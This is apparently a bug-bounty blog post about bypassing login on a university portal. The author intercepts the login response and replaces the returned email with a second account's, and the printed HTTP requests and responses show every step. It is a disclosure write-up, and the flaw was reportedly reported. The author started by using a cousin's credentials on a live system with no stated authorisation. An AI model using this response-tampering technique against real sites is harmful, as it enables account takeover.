How I found IDOR at a University Portal in 10 minutes!
As I was just messing up with my cousin’s Institute Portal, I noticed its login area and got curious to test its functionalities.
I got his credentials for that portal and intercepted its login request to Burpsuite. The request was given in the following format:
POST /login/process HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
router-path: /
Content-Type: application/json;charset=utf-8
Content-Length: 74
Origin: https://target.com
Connection: close
Referer: https://target.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
{"uid":"attacker@outlook.com","pass":"Pass@123","dns":"target.com"}
After that, I captured its response to the request shown as above.
Following is given the response I got for the request:
HTTP/1.1 200
Date: Thu, 19 Jan 2023 12:42:35 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Server: nginx/1.18.0
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 310
{"policy_read":true,"msg":"200","uid":"attacker@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}
I noticed that the response includes the email along with a token.
Still who knows if that token is actually functioning?!!
So on my phone, I created another account on the same portal with a different email as “victim@outlook.com”.
After successfully registering it, I manipulated the response given above by replacing the email value of attacker with the email of the new victim account, hence after changes, the response will look like this:
HTTP/1.1 200
Date: Thu, 19 Jan 2023 12:42:35 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Server: nginx/1.18.0
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 310
{"policy_read":true,"msg":"200","uid":"victim@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}
I forwarded the manipulated response and guess what?!
I got logged in to the victim account!!
I understood that the token used here was of NO USE!!
I created a POC of the bug and reported it to the Institute.
The token made it seem like this won’t be possible, but uncertainity still exists, so we took the chance and it worked out ;)
Happy Hacking !!
#bugbounty #ethicalhacking #cybersecurity #vulnerability